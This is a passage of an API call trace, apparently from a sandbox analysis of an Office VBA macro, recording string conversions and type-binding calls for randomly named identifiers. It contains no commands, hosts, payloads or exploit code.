CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b7a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="TAeDWpm") returned 8 [0023.226] ITypeComp:RemoteBind (in: This=0x2875638, szName="TAeDWpm", lHashVal=0x1032e2, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x266 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x266) returned 0x0 [0023.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b7a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="TAeDWpm") returned 8 [0023.226] ITypeComp:RemoteBind (in: This=0x2876778, szName="TAeDWpm", lHashVal=0x1032e2, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x266 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x266) returned 0x0 [0023.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b7a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="TAeDWpm") returned 8 [0023.226] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="TAeDWpm", lHashVal=0x1032e2, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x266 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x266) returned 0x0 [0023.226] CRetailMalloc_Alloc () returned 0x786b680 [0023.227] IUnknown:Release (This=0x2876548) returned 0x7 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e029a, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_TAeDWpm") returned 15 [0023.227] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_TAeDWpm", lHashVal=0x103666, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.227] CRetailMalloc_Free () returned 0xef90001 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798772, cbMultiByte=7, lpWideCharStr=0x47412a2, cchWideChar=16 | out: lpWideCharStr="NEYBPbz") returned 7 [0023.227] CRetailMalloc_Alloc () returned 0x786caf8 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579877e, cbMultiByte=9, lpWideCharStr=0x47412ee, cchWideChar=20 | out: lpWideCharStr="dYbUxrTzA") returned 9 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579878e, cbMultiByte=9, lpWideCharStr=0x4741376, cchWideChar=20 | out: lpWideCharStr="bkYNBvcKf") returned 9 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579879e, cbMultiByte=9, lpWideCharStr=0x4741492, cchWideChar=20 | out: lpWideCharStr="aGBNkUbhS") returned 9 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57987ae, cbMultiByte=11, lpWideCharStr=0x47415ae, cchWideChar=24 | out: lpWideCharStr="FLNYbpdHPzh") returned 11 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57987c0, cbMultiByte=9, lpWideCharStr=0x47416ce, cchWideChar=20 | out: lpWideCharStr="cUhhPCMMK") returned 9 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57987d0, cbMultiByte=10, lpWideCharStr=0x47417ea, cchWideChar=22 | out: lpWideCharStr="HppCTmXYAx") returned 10 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b9e, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="aVNHeGntBc") returned 11 [0023.227] ITypeComp:RemoteBind (in: This=0x2876550, szName="aVNHeGntBc", lHashVal=0x105c92, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x268 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x268) returned 0x0 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b9e, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="aVNHeGntBc") returned 11 [0023.227] ITypeComp:RemoteBind (in: This=0x2875638, szName="aVNHeGntBc", lHashVal=0x105c92, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x268 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x268) returned 0x0 [0023.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b9e, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="aVNHeGntBc") returned 11 [0023.227] ITypeComp:RemoteBind (in: This=0x2876778, szName="aVNHeGntBc", lHashVal=0x105c92, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x268 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x268) returned 0x0 [0023.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b9e, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="aVNHeGntBc") returned 11 [0023.228] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="aVNHeGntBc", lHashVal=0x105c92, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x268 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x268) returned 0x0 [0023.228] CRetailMalloc_Alloc () returned 0x78b3090 [0023.228] IUnknown:Release (This=0x2876548) returned 0x7 [0023.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e02c6, cbMultiByte=18, lpWideCharStr=0x125374, cchWideChar=19 | out: lpWideCharStr="_B_var_aVNHeGntBc") returned 18 [0023.228] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_aVNHeGntBc", lHashVal=0x10cafc, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.228] CRetailMalloc_Free () returned 0x1b20201 [0023.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57987e8, cbMultiByte=8, lpWideCharStr=0x4741a78, cchWideChar=18 | out: lpWideCharStr="uUMbeAYf") returned 8 [0023.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57987f4, cbMultiByte=9, lpWideCharStr=0x4741ac6, cchWideChar=20 | out: lpWideCharStr="CwZEARSew") returned 9 [0023.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798804, cbMultiByte=7, lpWideCharStr=0x4741b4e, cchWideChar=16 | out: lpWideCharStr="zMBsKCF") returned 7 [0023.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798812, cbMultiByte=11, lpWideCharStr=0x4741c66, cchWideChar=24 | out: lpWideCharStr="uUmexuzkFwn") returned 11 [0023.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798824, cbMultiByte=7, lpWideCharStr=0x4741d86, cchWideChar=16 | out: lpWideCharStr="cpvscrP") returned 7 [0023.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798832, cbMultiByte=11, lpWideCharStr=0x4741e9e, cchWideChar=24 | out: lpWideCharStr="FbzEWuRyRZX") returned 11 [0023.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798844, cbMultiByte=10, lpWideCharStr=0x4741fbe, cchWideChar=22 | out: lpWideCharStr="wMMASWhrfC") returned 10 [0023.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2bc6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="fCcAfNvw") returned 9 [0023.229] ITypeComp:RemoteBind (in: This=0x2876550, szName="fCcAfNvw", lHashVal=0x104a5e, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x26a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x26a) returned 0x0 [0023.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2bc6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="fCcAfNvw") returned 9 [0023.229] ITypeComp:RemoteBind (in: This=0x2875638, szName="fCcAfNvw", lHashVal=0x104a5e, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x26a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x26a) returned 0x0 [0023.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2bc6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="fCcAfNvw") returned 9 [0023.229] ITypeComp:RemoteBind (in: This=0x2876778, szName="fCcAfNvw", lHashVal=0x104a5e, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x26a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x26a) returned 0x0 [0023.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2bc6, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="fCcAfNvw") returned 9 [0023.229] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="fCcAfNvw", lHashVal=0x104a5e, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x26a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x26a) returned 0x0 [0023.229] CRetailMalloc_Alloc () returned 0x786b680 [0023.230] IUnknown:Release (This=0x2876548) returned 0x7 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e02f6, cbMultiByte=16, lpWideCharStr=0x125374, cchWideChar=17 | out: lpWideCharStr="_B_var_fCcAfNvw") returned 16 [0023.230] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_fCcAfNvw", lHashVal=0x1021e7, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.230] CRetailMalloc_Free () returned 0xef90001 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579885c, cbMultiByte=11, lpWideCharStr=0x474224c, cchWideChar=24 | out: lpWideCharStr="PrgRADKSZKD") returned 11 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579886c, cbMultiByte=7, lpWideCharStr=0x47422a0, cchWideChar=16 | out: lpWideCharStr="PNAAMkm") returned 7 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579887a, cbMultiByte=11, lpWideCharStr=0x4742324, cchWideChar=24 | out: lpWideCharStr="MvarReXTzeC") returned 11 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579888c, cbMultiByte=8, lpWideCharStr=0x4742444, cchWideChar=18 | out: lpWideCharStr="frYcTFUe") returned 8 [0023.230] CRetailMalloc_Alloc () returned 0x786cd20 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579889a, cbMultiByte=8, lpWideCharStr=0x474255e, cchWideChar=18 | out: lpWideCharStr="grUpbNyy") returned 8 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57988a8, cbMultiByte=9, lpWideCharStr=0x4742678, cchWideChar=20 | out: lpWideCharStr="KvuseXBhC") returned 9 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57988b8, cbMultiByte=9, lpWideCharStr=0x4742794, cchWideChar=20 | out: lpWideCharStr="LdRscrpCp") returned 9 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2bee, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="PbBXTEyXDg") returned 11 [0023.230] ITypeComp:RemoteBind (in: This=0x2876550, szName="PbBXTEyXDg", lHashVal=0x103387, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x26c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x26c) returned 0x0 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2bee, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="PbBXTEyXDg") returned 11 [0023.230] ITypeComp:RemoteBind (in: This=0x2875638, szName="PbBXTEyXDg", lHashVal=0x103387, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x26c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x26c) returned 0x0 [0023.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2bee, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="PbBXTEyXDg") returned 11 [0023.230] ITypeComp:RemoteBind (in: This=0x2876778, szName="PbBXTEyXDg", lHashVal=0x103387, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x26c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x26c) returned 0x0 [0023.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2bee, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="PbBXTEyXDg") returned 11 [0023.231] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="PbBXTEyXDg", lHashVal=0x103387, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x26c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x26c) returned 0x0 [0023.231] CRetailMalloc_Alloc () returned 0x78b3090 [0023.231] IUnknown:Release (This=0x2876548) returned 0x7 [0023.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0322, cbMultiByte=18, lpWideCharStr=0x125374, cchWideChar=19 | out: lpWideCharStr="_B_var_PbBXTEyXDg") returned 18 [0023.231] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_PbBXTEyXDg", lHashVal=0x10a1f1, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.231] CRetailMalloc_Free () returned 0x1b20201 [0023.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57988d0, cbMultiByte=8, lpWideCharStr=0x4742a20, cchWideChar=18 | out: lpWideCharStr="EXXvpXyv") returned 8 [0023.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57988dc, cbMultiByte=11, lpWideCharStr=0x4742a6e, cchWideChar=24 | out: lpWideCharStr="xEdcpyZnERE") returned 11 [0023.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57988ee, cbMultiByte=11, lpWideCharStr=0x4742afa, cchWideChar=24 | out: lpWideCharStr="LUHHCmphpXR") returned 11 [0023.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798900, cbMultiByte=9, lpWideCharStr=0x4742c1a, cchWideChar=20 | out: lpWideCharStr="SyuBTBGSG") returned 9 [0023.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798910, cbMultiByte=8, lpWideCharStr=0x4742d36, cchWideChar=18 | out: lpWideCharStr="EBfdfaWP") returned 8 [0023.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579891e, cbMultiByte=7, lpWideCharStr=0x4742e50, cchWideChar=16 | out: lpWideCharStr="MtgxaGC") returned 7 [0023.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579892c, cbMultiByte=11, lpWideCharStr=0x4742f68, cchWideChar=24 | out: lpWideCharStr="PfxYdtzCWtb") returned 11 [0023.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c16, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="ZryTTckxYPf") returned 12 [0023.232] ITypeComp:RemoteBind (in: This=0x2876550, szName="ZryTTckxYPf", lHashVal=0x10c2c0, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x26e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x26e) returned 0x0 [0023.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c16, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="ZryTTckxYPf") returned 12 [0023.232] ITypeComp:RemoteBind (in: This=0x2875638, szName="ZryTTckxYPf", lHashVal=0x10c2c0, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x26e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x26e) returned 0x0 [0023.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c16, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="ZryTTckxYPf") returned 12 [0023.232] ITypeComp:RemoteBind (in: This=0x2876778, szName="ZryTTckxYPf", lHashVal=0x10c2c0, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x26e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x26e) returned 0x0 [0023.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2c16, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="ZryTTckxYPf") returned 12 [0023.232] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="ZryTTckxYPf", lHashVal=0x10c2c0, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x26e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x26e) returned 0x0 [0023.232] CRetailMalloc_Alloc () returned 0x78b3090 [0023.233] IUnknown:Release (This=0x2876548) returned 0x7 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0352, cbMultiByte=19, lpWideCharStr=0x125374, cchWideChar=20 | out: lpWideCharStr="_B_var_ZryTTckxYPf") returned 19 [0023.233] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_ZryTTckxYPf", lHashVal=0x10b422, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.233] CRetailMalloc_Free () returned 0x1b20201 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798946, cbMultiByte=8, lpWideCharStr=0x47431f8, cchWideChar=18 | out: lpWideCharStr="ZhAyuant") returned 8 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798952, cbMultiByte=7, lpWideCharStr=0x4743246, cchWideChar=16 | out: lpWideCharStr="gkXhpaH") returned 7 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798960, cbMultiByte=11, lpWideCharStr=0x47432ca, cchWideChar=24 | out: lpWideCharStr="XTYbKbhZGVA") returned 11 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798972, cbMultiByte=7, lpWideCharStr=0x47433ea, cchWideChar=16 | out: lpWideCharStr="tFmhVnR") returned 7 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798980, cbMultiByte=8, lpWideCharStr=0x4743502, cchWideChar=18 | out: lpWideCharStr="gXKRAers") returned 8 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579898e, cbMultiByte=10, lpWideCharStr=0x474361c, cchWideChar=22 | out: lpWideCharStr="kTHZrxKVBk") returned 10 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579899e, cbMultiByte=9, lpWideCharStr=0x474373a, cchWideChar=20 | out: lpWideCharStr="NGcwzdsLV") returned 9 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57989ae, cbMultiByte=8, lpWideCharStr=0x4743856, cchWideChar=18 | out: lpWideCharStr="pDuZtEGx") returned 8 [0023.233] CRetailMalloc_Alloc () returned 0x786cf48 [0023.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b56, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="hZvnrDN") returned 8 [0023.234] ITypeComp:RemoteBind (in: This=0x2876550, szName="hZvnrDN", lHashVal=0x10ced3, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x264 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x264) returned 0x0 [0023.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b56, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="hZvnrDN") returned 8 [0023.234] ITypeComp:RemoteBind (in: This=0x2875638, szName="hZvnrDN", lHashVal=0x10ced3, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x264 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x264) returned 0x0 [0023.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b56, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="hZvnrDN") returned 8 [0023.234] ITypeComp:RemoteBind (in: This=0x2876778, szName="hZvnrDN", lHashVal=0x10ced3, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x264 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x264) returned 0x0 [0023.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b56, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="hZvnrDN") returned 8 [0023.234] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="hZvnrDN", lHashVal=0x10ced3, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x264 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x264) returned 0x0 [0023.234] CRetailMalloc_Alloc () returned 0x786b680 [0023.234] IUnknown:Release (This=0x2876548) returned 0x7 [0023.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0382, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_hZvnrDN") returned 15 [0023.234] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_hZvnrDN", lHashVal=0x10d257, wFlags=0x5, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.235] CRetailMalloc_Free () returned 0xef90001 [0023.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57989c4, cbMultiByte=9, lpWideCharStr=0x47518cc, cchWideChar=20 | out: lpWideCharStr="YyzpDedfr") returned 9 